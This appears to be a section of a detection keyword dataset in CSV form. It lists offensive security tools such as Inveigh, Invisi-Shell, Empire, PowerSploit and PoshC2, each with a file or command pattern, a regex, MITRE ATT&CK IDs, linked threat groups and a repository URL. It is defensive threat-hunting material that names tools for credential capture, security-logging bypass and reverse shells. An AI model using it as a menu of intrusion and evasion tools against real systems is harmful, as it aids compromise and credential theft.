"*Inveigh.psd1*",".{0,1000}Inveigh\.psd1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48751" "*Inveigh.psm1*",".{0,1000}Inveigh\.psm1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48752" "*Inveigh.sln*",".{0,1000}Inveigh\.sln.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48753" "*inveigh_version*",".{0,1000}inveigh_version.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - 
CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48754" "*Inveigh-BruteForce.ps1*",".{0,1000}Inveigh\-BruteForce\.ps1.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","48755" "*Inveigh-Cleartext.txt*",".{0,1000}Inveigh\-Cleartext\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48756" "*Inveigh-FormInput.txt*",".{0,1000}Inveigh\-FormInput\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & 
Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48757" "*Inveigh-Log.txt*",".{0,1000}Inveigh\-Log\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48758" "*Inveigh-master*",".{0,1000}Inveigh\-master.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48759" "*Inveigh-net*.zip*",".{0,1000}Inveigh\-net.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48760" "*Inveigh-NTLMv1.txt*",".{0,1000}Inveigh\-NTLMv1\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48761" "*Inveigh-NTLMv2.txt*",".{0,1000}Inveigh\-NTLMv2\.txt.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - 
T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48762" "*-InveighRelay *",".{0,1000}\-InveighRelay\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48763" "*Inveigh-Relay.ps1*",".{0,1000}Inveigh\-Relay\.ps1.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48764" "*inveighzero.exe*",".{0,1000}inveighzero\.exe.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","1","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","48765" "*InvisibilityCloak.py*",".{0,1000}InvisibilityCloak\.py.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","1","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","48768" "*Invisi-Shell*",".{0,1000}Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48769" "*InvisiShellProfiler.cpp*",".{0,1000}InvisiShellProfiler\.cpp.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48770" "*InvisiShellProfiler.def*",".{0,1000}InvisiShellProfiler\.def.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48771" "*InvisiShellProfiler.dll*",".{0,1000}InvisiShellProfiler\.dll.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48772" "*InvisiShellProfiler.h*",".{0,1000}InvisiShellProfiler\.h.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48773" "*InvisiShellProfiler.pdb*",".{0,1000}InvisiShellProfiler\.pdb.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48774" "*InvisiShellProfiler.vcxproj*",".{0,1000}InvisiShellProfiler\.vcxproj.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","N/A","10","10","1167","166","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z","48775" "*invoke obfuscation*",".{0,1000}invoke\sobfuscation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48776" "*invoke* -Action command -Execute * -Session*",".{0,1000}invoke.{0,1000}\s\-Action\scommand\s\-Execute\s.{0,1000}\s\-Session.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an 
SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","48777" "*Invoke-*WDigestDowngrade.ps1*",".{0,1000}Invoke\-.{0,1000}WDigestDowngrade\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48778" "*invoke_obfuscation.py*",".{0,1000}invoke_obfuscation\.py.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. 
This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","48779" "*invoke_sessiongopher.py*",".{0,1000}invoke_sessiongopher\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","48780" "*Invoke-AADIntReconAsGuest*",".{0,1000}Invoke\-AADIntReconAsGuest.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","48784" "*Invoke-AADIntUserEnumerationAsGuest*",".{0,1000}Invoke\-AADIntUserEnumerationAsGuest.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","48789" "*Invoke-AccessCheck 
-PSRemoting*",".{0,1000}Invoke\-AccessCheck\s\-PSRemoting.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48792" "*Invoke-AccessCheck -SMB*",".{0,1000}Invoke\-AccessCheck\s\-SMB.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","0","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48793" "*Invoke-AccessCheck.ps1*",".{0,1000}Invoke\-AccessCheck\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","48794" "*Invoke-AccessCheckForAllGroups*",".{0,1000}Invoke\-AccessCheckForAllGroups.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48795" 
"*Invoke-AccessCheckForAllServicePrincipals*",".{0,1000}Invoke\-AccessCheckForAllServicePrincipals.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48796" "*Invoke-AccessCheckForAllUsers*",".{0,1000}Invoke\-AccessCheckForAllUsers.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48797" "*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48798" "*Invoke-AccessCheckForCurrentUser*",".{0,1000}Invoke\-AccessCheckForCurrentUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48799" 
"*Invoke-AccessCheckForGroup*",".{0,1000}Invoke\-AccessCheckForGroup.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48800" "*Invoke-AccessCheckForServicePrincipal*",".{0,1000}Invoke\-AccessCheckForServicePrincipal.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48801" "*Invoke-AccessCheckForUser*",".{0,1000}Invoke\-AccessCheckForUser.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","0","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","48802" "*Invoke-ACLcsvFileAnalysis*",".{0,1000}Invoke\-ACLcsvFileAnalysis.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48803" "*Invoke-ACLPwn*",".{0,1000}Invoke\-ACLPwn.{0,1000}","offensive_tool_keyword","Invoke-ACLpwn","Invoke-ACLpwn is a tool that automates the discovery and pwnage of 
ACLs in Active Directory that are unsafely configured.","T1098 - T1208 - T1484 - T1486 - T1059","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/fox-it/Invoke-ACLPwn","1","0","N/A","N/A","N/A","6","520","88","2022-09-15T15:13:00Z","2018-04-26T09:21:27Z","48804" "*Invoke-ACLScanner * -Filter *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Filter\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48805" "*Invoke-ACLScanner * -Name *",".{0,1000}Invoke\-ACLScanner\s.{0,1000}\s\-Name\s.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","N/A","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","48806" "*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","48807" "*invoke-aclscanner*",".{0,1000}invoke\-aclscanner.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - 
T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","48808" "*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48809" "*Invoke-ACLScanner*",".{0,1000}Invoke\-ACLScanner.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - 
